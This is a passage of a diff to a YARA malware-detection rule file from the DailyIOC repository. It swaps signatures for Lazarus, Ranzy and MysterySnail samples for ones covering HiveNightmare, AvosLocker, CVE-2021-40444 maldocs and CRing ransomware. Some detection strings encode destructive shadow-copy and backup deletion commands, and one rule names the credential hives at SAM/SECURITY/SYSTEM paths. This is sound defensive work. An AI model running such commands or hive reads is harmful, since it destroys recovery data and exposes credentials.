3b ec e8 [2] 00 00 8b e5 5d }
-		$s3 = { c7 45 f0 61 00 00 00 c7 45 c8 20 00 00 00 c7 45 cc 88 00 00 00 c7 45 dc 01 00 00 00 8d 45 f0 89 45 d0 33 c0 66 89 45 d4 c7 45 d8 00 00 00 00 c7 45 e0 00 00 00 00 8b 45 08 89 45 e4 8b f4 8d 45 c8 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 b0 83 7d b0 ff 74 17 8b f4 8d 45 bc 50 8b 4d b0 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 52 8b cd 50 8d 15 2c 13 40 00 e8 [2] 00 00 58 5a 5f 5e 5b 8b 4d fc 33 cd e8 [2] 00 00 81 c4 2c 01 00 00 3b ec e8 [2] 00 00 8b e5 }
-		$s4 = { 8b 45 ec 8b 08 81 e1 ff ff 00 00 8b f4 51 8b 55 bc 52 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 4d f8 89 01 eb 25 8b 45 ec 8b 08 8b 55 08 8d 44 0a 02 8b f4 50 8b 4d bc 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 55 f8 89 02 8b 45 f8 83 c0 04 89 45 f8 8b 45 ec 83 c0 04 89 45 ec eb 8c 8b 45 c8 83 c0 14 89 45 c8 e9 25 ff ff ff 5f 5e 5b 81 c4 08 01 00 00 3b ec e8 [2] 00 00 8b e5 }
+		$s1 = "\\pipe\\lsarpc" fullword wide
+		$s2 = { 5c 00 5c 00 25 00 73 00 5c 00 [4-12] 5c 00 [4-12] 00 2e 00 65 00 78 00 65 }
+		$s3 = { 5c 00 5c 00 25 00 73 00 00 00 00 00 6e 00 63 00 61 00 63 00 6e 00 5f 00 6e 00 70 }
+		$s4 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a }
+		$s5 = { 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 20 61 74 20 66 69 6c 65 20 25 68 73 20 6c 69 6e 65 20 25 64 }
+		$s6 = { 50 e8 06 95 ff ff 83 c4 10 c7 85 00 ff ff ff 00 00 00 00 8b 85 00 ff ff ff 50 8d 8d 0c ff ff ff 51 8d 55 dc 52 8b 45 f4 50 e8 4e 7a ff ff 83 c4 10 89 45 e8 83 7d }
+		$s7 = "Attack success!!!\n" fullword wide
+		$s8 = { 8b 43 0c 56 83 e8 24 8d 73 20 50 56 8d 45 b4 50 8d 45 e8 50 e8 02 02 00 00 68 b8 52 4f 00 8d 45 b4 50 68 bc 52 4f 00 8d 45 e8 50 8b 43 0c 68 c0 52 4f 00 ff 75 10 83 e8 24 68 cc 52 4f 00 50 68 00 53 4f 00 56 68 0c 53 4f 00 68 20 53 4f 00 68 78 53 4f 00 8d 85 c0 fe ff ff 68 f4 00 00 00 50 e8 4e 91 ff ff 83 c4 4c 8d 85 c0 fe ff ff 50 6a 04 }
+		$s9 = { 25 73 25 73 25 70 25 73 25 7a 64 25 73 25 64 25 73 25 73 25 73 25 73 25 73 }
+		$s10 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 00 20 00 3a 00 20 00 25 00 6c 00 73 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and filesize < 900KB and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 50KB and 7 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Lazarus_HTA_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_Exp_CVE_2021_36934_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect HTA with the fake picture header as decoy used by Lazarus"
+		description = "Detect CVE_2021_36934 exploit (HiveNightmare)"
 		author = "Arkbird_SOLG"
-		id = "1a57251e-f0fb-541c-bf8b-f1afecf7f1c7"
-		date = "2021-04-27"
-		modified = "2021-04-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-27/Lazarus/APT_Lazarus_HTA_Apr_2021_1.yara#L1-L21"
+		id = "3a0ed4f7-8a99-569f-a636-4cd64c2121bb"
+		date = "2021-07-23"
+		modified = "2021-07-23"
+		reference = "https://github.com/GossiTheDog/HiveNightmare"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/HiveNightmare/Exp_CVE_2021_36934_July_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "40c2e5b662d1999c3ae5be97604bb9ebc809a383d66331cb4b385666ce55be2a"
+		logic_hash = "2fd6cdf8a81f239473716d2c10a1754ebb2c60099eebd9d0cc1450ad3441075b"
 		score = 75
-		quality = 63
+		quality = 48
 		tags = "FILE"
-		hash1 = "888cfc87b44024c48eed794cc9d6dea9f6ae0cc3468dee940495e839a12ee0db"
+		hash1 = "0009d4950559b508353b951a314c5ac0aaae8161751017d3d4681dc805374eaa"
+		hash2 = "7baab69f86b50199456c9208624dd16aeb0d18d8a6f2010ee6501a183476f12f"
+		hash3 = "9035f88894a937892c63ac9a3c6c16301c7ecea7c11cf31d0fd24c39f17c8c2f"
 		tlp = "white"
-		adversary = "Lazarus"
+		adversary = "-"
 
 	strings:
-		$s1 = { 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e }
-		$s2 = { 5b 27 4f 70 65 6e 54 65 78 74 46 69 6c 65 27 2c 27 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 27 }
-		$s3 = { 5b 27 70 75 73 68 27 5d }
-		$s4 = { 28 27 4d 5a 27 29 2c 65 5b 27 43 6c 6f 73 65 27 5d 28 29 }
-		$s5 = { 5b 27 73 68 69 66 74 27 5d 28 29 }
-		$s6 = { 3b 76 61 72 20 64 61 74 61 3d 5b }
-		$s7 = { 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 }
+		$s1 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" fullword wide
+		$s2 = "Windows\\System32\\config\\SECURITY" fullword wide
+		$s3 = "Windows\\System32\\config\\SYSTEM" fullword wide
+		$s4 = "Windows\\System32\\config\\SAM" fullword wide
+		$s5 = "SECURITY-" fullword wide
+		$s6 = { 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 53 45 43 55 52 49 54 59 20 3a  }
+		$s7 = { 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d }
 
 	condition:
-		( uint16( 0 ) == 0x4d42 or uint16( 0 ) == 0xd8ff or uint32( 0 ) == 0x474e5089 or uint32( 0 ) == 0x38464947 ) and filesize > 20KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 50KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_1647_Apr_2021_1 : CVE_2021_1647 FILE
+rule ARKBIRD_SOLG_RAN_Avoslocker_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect CVE-2021-1647 tool "
+		description = "Detect AvosLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "c4c14d22-adf8-51b1-b898-7e253447824f"
-		date = "2021-05-04"
-		modified = "2021-05-05"
-		reference = "-"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-04/CVE-2021-1647/EXP_CVE_2021_1647_Apr_2021_1.yara#L1-L18"
+		id = "3fbc707f-9802-54bc-933b-bc4c4953b1d0"
+		date = "2021-07-23"
+		modified = "2021-07-24"
+		reference = "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/AvosLocker/RAN_AvosLocker_July_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "58f16973f68b1b792f6f1575b6a3f386493d033767ee97e48a33044e3ddc3426"
+		logic_hash = "e2291f574b5ab68e901a76b6511e0ee4c1eee51d5e3eced62bf68ceedb061958"
 		score = 75
 		quality = 75
-		tags = "CVE-2021-1647, FILE"
-		hash1 = "6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788"
-		hash2 = "9eaea8a56c47524f6d6b2e2bb72d035c1aa782a4f069ef9df92a0af5c6ee612b"
-		hash3 = "db0e53c9db41d4de21f4bbf1f60d977f5d935239d3fce8b902e8ef0082796cc7"
-		hash4 = "24d9ff44affea06435829507e8e6cb4b659468aa2af510031ed963caf5a6d77a"
-		tlp = "Green"
+		tags = "FILE"
+		hash1 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
+		hash2 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
+		tlp = "white"
 		adversary = "-"
 
 	strings:
-		$seq1 = { 83 7d ec 01 0f 8e fe 76 ff ff 83 45 f4 01 83 7d f4 01 0f 8e e4 76 ff ff 8b 45 e4 89 04 24 e8 12 74 ff ff 83 ec 04 a1 [2] 01 b1 85 c0 75 0e 8b 45 e4 89 04 24 e8 fb 73 ff ff 83 ec 04 a1 28 ?? 01 b1 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 08 b8 00 00 00 00 c9 c2 04 00 55 89 e5 83 ec 10 c7 45 f4 00 ?? 01 70 8b 45 08 83 e8 01 a3 70 ?? 01 b1 c7 05 74 ?? 01 b1 00 00 00 00 c7 05 a0 ?? 02 b1 00 00 00 00 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 }
-		$seq2 = { a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 74 1d a1 74 ?? 01 b1 83 e8 01 83 e0 01 85 c0 74 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 83 e0 fe 89 c2 a1 [2] 01 b1 29 c2 89 d0 25 ff 0f 00 00 a3 5c ?? 01 b1 a1 74 ?? 01 b1 a3 a0 ?? 02 b1 8b 15 70 ?? 01 b1 a1 74 ?? 01 b1 01 d0 d1 e8 83 c0 01 a3 74 ?? 01 b1 83 7d 0c 00 75 0e 8b 15 5c ?? 01 b1 8b 45 f4 01 d0 89 45 fc c7 45 f8 00 00 00 00 eb 19 8b 45 f8 05 e2 ff ff 7f 8d 14 00 8b 45 fc 01 d0 66 c7 00 01 00 83 45 f8 01 83 7d f8 3b 7e e1 8b 45 fc }
+		$s1 = { 64 72 69 76 65 20 25 73 20 74 6f 6f 6b 20 25 66 20 73 65 63 6f 6e 64 73 0a 00 00 00 25 63 3a 00 64 72 69 76 65 3a 20 25 73 }
+		$s2 = { 63 6c 69 65 6e 74 5f 72 73 61 5f 70 72 69 76 3a 20 25 73 0a }
+		$s3 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d }
+		$s4 = { ff 35 b8 2c 46 00 88 9d 7c ef ff ff e8 3c 56 02 00 50 8d 85 71 ef ff ff 50 e8 c5 9e ff ff 83 c4 0c 8d 85 94 ef ff ff 50 53 53 68 14 01 00 00 ff 35 b8 2c 46 00 ff b5 90 ef ff ff ff 15 00 a0 44 00 85 c0 0f 85 cd 00 00 00 8b 35 48 a0 44 00 8d 85 98 fe ff ff 53 68 ff 00 00 00 50 68 00 04 00 00 ff d6 50 53 68 00 10 00 00 ff 15 44 a0 44 00 b1 3e c7 85 70 ef ff ff 3e 7b 6c 6c c7 85 74 ef ff ff 71 6c 04 1e 8b c3 c7 85 78 ef ff ff 1b 4d 34 00 30 8c 05 71 ef ff ff 40 83 f8 0a 73 08 8a 8d 70 ef ff ff eb eb 8d 85 98 fe ff ff 88 9d 7b ef ff ff 50 8d 85 71 ef ff ff 50 e8 23 9e ff ff 0f 28 05 00 8b 45 00 59 0f 11 85 48 ef ff ff 59 0f 28 05 40 8b 45 00 8b cb 0f 11 85 58 ef ff ff 66 c7 }
+		$s5 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 a6 ca ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 48 a1 44 00 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b }
+		$s6 = { 4d 61 70 3a 20 25 73 0a 00 00 00 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6e 00 67 00 20 00 25 00 6c 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 }
+		$s7 = { 44 6f 6e 65 21 21 0a 00 25 66 20 73 65 63 6f 6e 64 73 0a }
+		$s8 = { 56 68 01 00 00 08 6a 01 52 ff 15 14 a0 44 00 85 c0 0f 84 97 00 00 00 8d 45 f8 50 53 53 6a 06 53 ff 36 8b 1d 20 a0 44 00 ff d3 85 c0 74 73 ff 75 f8 e8 3b a7 01 00 a3 b8 2c 46 00 59 85 c0 }
 
 	condition:
-		filesize > 10KB and all of them
+		uint16( 0 ) == 0x5A4D and filesize > 50KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Ranzy_Locker_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_Exp_CVE_2021_40444_Sep_2021_1 : FILE
 {
 	meta:
-		description = " Detect Ranzy Locker (RAAS)"
+		description = "Detect the maldocs with a structure like used for CVE_2021_40444 exploit"
 		author = "Arkbird_SOLG"
-		id = "7e81d73a-ef18-5f89-b6b3-f56212d30b4a"
-		date = "2020-11-19"
-		modified = "2020-11-19"
-		reference = "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-19/Ranzy_Locker/Ran_Ranzy_Locker_Nov_2020_1.yar#L1-L36"
+		id = "acaba73d-f744-5d3f-9617-e976832f3577"
+		date = "2021-09-09"
+		modified = "2021-09-09"
+		reference = "https://github.com/StrangerealIntel/DailyIOC"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-09/Exp_CVE_2021_40444_Sep_2021_1.yara#L2-L20"
 		license_url = "N/A"
-		logic_hash = "e27017fa196d14b88c5cb682a070d10e42b63f9e21189d9917c0ae03c47216cc"
-		score = 75
+		logic_hash = "ba1b256c9caad3371d57e6ecbe54721038c819c7c081edf2443523109c25b184"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "393fd0768b24cd76ca653af3eba9bff93c6740a2669b30cf59f8a064c46437a2"
-		hash2 = "90691a36d1556ba7a77d0216f730d6cd9a9063e71626489094313c0afe85a939"
-		hash3 = "ade5d0fe2679fb8af652e14c40e099e0c1aaea950c25165cebb1550e33579a79"
-		hash4 = "bbf122cce1176b041648c4e772b230ec49ed11396270f54ad2c5956113caf7b7"
-		hash5 = "c4f72b292750e9332b1f1b9761d5aefc07301bc15edf31adeaf2e608000ec1c9"
+		reference1 = "-"
+		hash1 = "199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455"
+		hash2 = "3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf"
+		hash3 = "5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185"
+		hash4 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52"
+		tlp = "White"
+		level = "experimental"
+		adversary = "-"
 
 	strings:
-		$s1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
-		$s2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
-		$s3 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
-		$s4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
-		$s5 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
-		$s6 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
-		$s7 = "7B5549447D" ascii
-		$s8 = "7B5041545445524E5F49447D" ascii
-		$s9 = "726561646D652E747874" ascii
-		$s10 = "226E6574776F726B223A22" ascii
-		$s11 = "226C616E67223A22" ascii
-		$s12 = "7B4558547D" ascii
-		$s13 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838"
-		$s14 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
-		$s15 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
-		$s16 = "227375626964223A22" ascii
-		$s17 = "22657874223A22" ascii
-		$s18 = "226B6579223A22" ascii
-		$seq1 = { 8b 46 50 8d 4d a4 83 7d d4 10 53 8b 1d 14 80 41 00 89 45 a4 8d 45 c0 0f 43 45 c0 51 50 6a 00 6a 01 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 b9 00 00 00 8b 46 68 8d 4d a4 83 7d ec 10 57 89 45 a4 8d 45 d8 0f 43 45 d8 33 ff 51 50 6a 00 47 57 6a 00 ff 35 e8 1c 42 00 ff d3 85 c0 0f 84 8a 00 00 00 c6 45 fc 02 33 db 8b 45 e8 8b 4d d0 03 c1 6a 0f 5a 89 5d b8 89 55 bc 88 5d a8 89 7d a4 3b c2 76 15 88 5d a0 8d 4d a8 ff 75 a0 50 e8 78 02 00 00 8b 4d d0 89 5d b8 83 7d d4 10 8d 45 c0 51 0f 43 45 c0 8d 4d a8 50 e8 ca de ff ff 83 7d ec 10 8d 45 d8 ff 75 e8 0f 43 45 d8 8d 4d a8 50 e8 b3 de ff ff 8d 45 a8 50 8d 4e 70 e8 b8 d8 ff ff 8d 4d a8 e8 3f bf ff ff 8d 4d d8 e8 37 bf ff ff 8d 4d c0 e8 2f bf ff ff b0 01 eb 12 8d 4d d8 e8 23 bf ff ff 8d 4d c0 e8 1b bf ff ff 32 c0 e8 3f f1 }
-		$seq2 = { 8b 75 08 33 ff 8b 55 0c 33 c0 89 b5 68 fb ff ff 89 bd ac fb ff ff c7 85 b0 fb ff ff 07 00 00 00 66 89 85 9c fb ff ff 89 7d fc 39 7a 10 0f 84 da 00 00 00 6a 02 0f 57 c0 8d 8d 84 fb ff ff 58 66 0f 13 85 bc fb ff ff 66 89 85 b4 fb ff ff e8 6e ac ff ff 83 78 14 10 72 02 8b 00 50 ff 15 18 82 41 00 8d 8d 84 fb ff ff 89 85 b8 fb ff ff e8 8f a8 ff ff 68 87 69 00 00 ff 15 0c 82 41 00 bb 01 04 00 00 66 89 85 b6 fb ff ff 53 8d 85 c4 fb ff ff 57 50 e8 fd 2d 00 00 83 c4 0c 8d 7d cc 33 c0 6a 08 59 6a 08 6a 20 f3 ab 8d 45 cc 50 53 8d 85 c4 fb ff ff 50 6a 10 8d 85 b4 fb ff ff 50 ff 15 1c 82 41 00 85 c0 75 45 8d 85 c4 fb ff ff 50 8d 8d 6c fb ff ff e8 7f a8 ff ff 8b d0 c6 45 fc 01 8d 8d 84 fb ff ff e8 26 ab ff ff 50 8d 8d 9c fb ff ff e8 88 bf ff ff 8d 8d 84 fb ff ff e8 c8 c2 ff ff 8d 8d 6c fb ff ff e8 f5 a7 ff ff 8d 85 9c fb }
+		$x1 = { 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 55 54 09 00 03 [3] 61 [3] 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ?? 94 ?? 4e c2 [3] ef 4d 7c 87 }
+		$x2 = { 77 6d 66 55 54 09 00 03 00 a6 ce 12 00 a6 ce 12 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 bb 7e f6 d8 2c 06 38 48 00 93 85 e1 8c 0c 9c 0c 0c cc 52 60 1e 2b 98 64 01 62 66 46 0e 30 8f 9b 09 26 ce 03 66 31 83 55 00 00 50 4b 03 04 ?? 00 00 00 ?? 00 [10] 00 00 [2] 00 00 ?? 00 1c 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 10 of ( $s* ) and 1 of ( $seq* )
+		uint16( 0 ) == 0x4B50 and filesize > 5KB and all of ( $x* )
 }
-rule ARKBIRD_SOLG_MAL_Mysterysnail_RAT_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Cring_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect MysterySnaial RAT implant"
+		description = "Detect CRing ransomware"
 		author = "Arkbird_SOLG"
-		id = "2fa5015a-144f-52f6-8a5f-28fce10861e3"
-		date = "2021-10-13"
-		modified = "2021-10-14"
-		reference = "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-14/MAL_MysterySnail_RAT_Oct_2021_1.yara#L1-L25"
+		id = "3648494d-8c27-5767-90e8-45e294aac382"
+		date = "2021-04-08"
+		modified = "2021-04-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-08/CRing/RAN_CRing_Apr_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "bcf072fae02b479084b8d47b4cd676216f72aecfa4ebcf8226b6997839929b57"
+		logic_hash = "d82db146c9048391d79bda6cc5913363fc3cfc1a7cca26b23b362b7f3563ef3c"
 		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "e84be291efadd53a8bb965bfb589590ffe870da9187e6752cc7a9f028053ff5d"
-		hash2 = "b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e"
-		hash3 = "73f520223a2e01c036a4b620c7188e733c113a429e25c5c3de7fbbc1c3d16ccc"
-		level = "experimental"
-		tlp = "White"
-		adversary = "MysterySnail"
+		hash1 = "274ef2fba8ba46187f9cf462a02de286ea23ec75d163af01088f6856944817eb"
+		hash2 = "f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8"
+		hash3 = "ebb528207b2fc06a6bc89e9d430bcdfe254f0838b0f4660f67cc6bd1ebc193be"
+		level = "Experimental"
 
 	strings:
-		$s1 = { 57 48 83 ec 20 4c 8b c2 33 f6 0f b6 d1 41 b1 01 8b c2 c1 e8 04 41 84 c1 75 53 4d 85 c0 74 47 41 0f b7 08 8d 41 bf 66 83 f8 19 76 0a 66 83 e9 61 66 83 f9 19 77 08 66 41 83 78 02 3a 74 03 44 8a ce 45 84 c9 49 8d 40 04 49 8b c8 48 0f 45 c8 66 39 31 74 19 66 83 39 5c 74 06 66 83 39 2f 75 06 66 39 71 02 74 07 bb 00 80 00 00 eb 05 bb 40 40 00 00 66 c1 e2 07 b8 80 00 00 00 66 f7 d2 66 23 d0 b8 00 01 00 00 66 0b d0 66 0b da 4d 85 c0 74 65 ba 2e 00 00 00 49 8b c8 e8 64 4b 01 00 48 8b f8 48 85 c0 74 50 48 8d 15 a9 0d 09 00 48 8b c8 e8 5d dd 00 00 85 c0 74 39 48 8d 15 a6 0d 09 00 48 8b cf e8 4a dd 00 00 85 c0 74 26 48 8d 15 a3 0d 09 00 48 8b cf e8 37 dd 00 00 85 c0 74 13 48 8d 15 a0 0d 09 00 48 8b cf e8 24 dd 00 00 85 c0 75 04 66 83 cb 40 48 8b 74 24 38 0f b7 c3 66 c1 e8 03 66 83 e0 38 66 0b d8 0f b7 c3 66 c1 e8 06 66 83 e0 07 66 0b c3 48 8b 5c 24 30 }
-		$s2 = { 4c 8d 0d 6e 96 09 00 48 89 44 24 20 44 8b c7 48 8d 15 a7 62 0d 00 48 8b ce e8 47 17 fb ff 85 c0 0f 8e 83 00 00 00 4c 8d 0d 48 96 09 00 44 8b c7 48 8d 15 36 59 0d 00 48 8b ce e8 26 17 fb ff 85 c0 7e 66 49 8b 46 10 8b 08 81 f9 0a 04 00 00 74 1b 81 f9 3f 04 00 00 74 13 81 f9 0b 04 00 00 44 8b c3 41 0f }
-		$s3 = { 25 2a 73 70 75 62 3a 0a }
-		$s4 = { 48 81 ec b0 02 00 00 48 8b 05 7a e9 7b 00 48 33 c4 48 89 84 24 a0 02 00 00 48 8b ea 48 8d 44 24 38 48 8d 15 c0 a1 79 00 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 c7 c1 01 00 00 80 ff 15 3d 94 71 00 85 c0 75 53 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 84 24 d0 01 00 00 c7 44 24 34 01 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 e6 a1 79 00 c7 44 24 30 c7 00 00 00 ff 15 00 94 71 00 85 c0 75 0e 8b 84 24 d0 01 00 00 89 45 68 85 c0 75 07 33 c0 e9 eb 00 00 00 83 f8 01 75 f4 33 d2 48 8d 4c 24 40 41 b8 90 01 00 00 e8 f0 82 6f 00 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 44 24 40 c7 44 24 30 c8 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 90 a1 79 00 ff 15 9a 93 71 00 85 c0 75 a8 33 f6 8b fe 8b de 66 83 7c 5c 40 3a 74 15 48 83 fb 64 74 94 ff c7 48 ff c3 48 83 fb 64 7c e7 33 c0 eb 77 48 63 c7 48 8d 4c 24 42 4c 89 b4 24 d0 02 00 00 4c 8d 34 00 49 03 ce e8 2f ad 6f 00 89 45 64 49 81 }
-		$s5 = { 48 8d 4c 24 60 ff 97 18 04 00 00 33 f6 c7 45 90 01 00 00 00 0f 57 c0 48 89 74 24 68 33 c9 66 0f 7f 44 24 70 48 89 75 80 48 89 75 88 c7 45 94 01 00 00 00 48 c7 45 9c 01 00 00 00 48 89 75 a8 e8 32 97 6f 00 8d 4e 01 48 89 45 b0 e8 26 97 6f 00 8d 4e 02 48 89 45 b8 e8 1a 97 6f 00 48 89 45 c0 45 33 c9 48 8d 45 d0 45 33 c0 48 89 44 24 48 48 8b d3 48 8d 44 24 60 33 c9 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 89 74 24 28 c7 44 24 20 01 00 00 00 ff 97 90 03 00 00 85 c0 74 0a 48 8b 4d d8 ff 15 da 8f 71 00 48 8b 4d d0 ff 15 d0 8f 71 00 b9 10 27 00 00 ff 15 b5 8f 71 00 0f 10 05 96 9c 79 00 48 8d 4d 08 33 d2 f2 0f 10 0d 98 9c 79 00 41 b8 b8 07 00 00 0f 29 45 f0 f2 0f 11 4d 00 e8 84 7d 6f 00 4c 8d 05 65 9c 79 00 48 8d 55 f0 48 8d 4c 24 58 e8 c3 98 6f 00 85 c0 0f 85 af 00 00 00 48 8b 4c 24 58 44 8d 40 02 33 d2 e8 db aa 6f 00 48 8b 4c 24 58 e8 71 94 6f 00 48 8b 4c 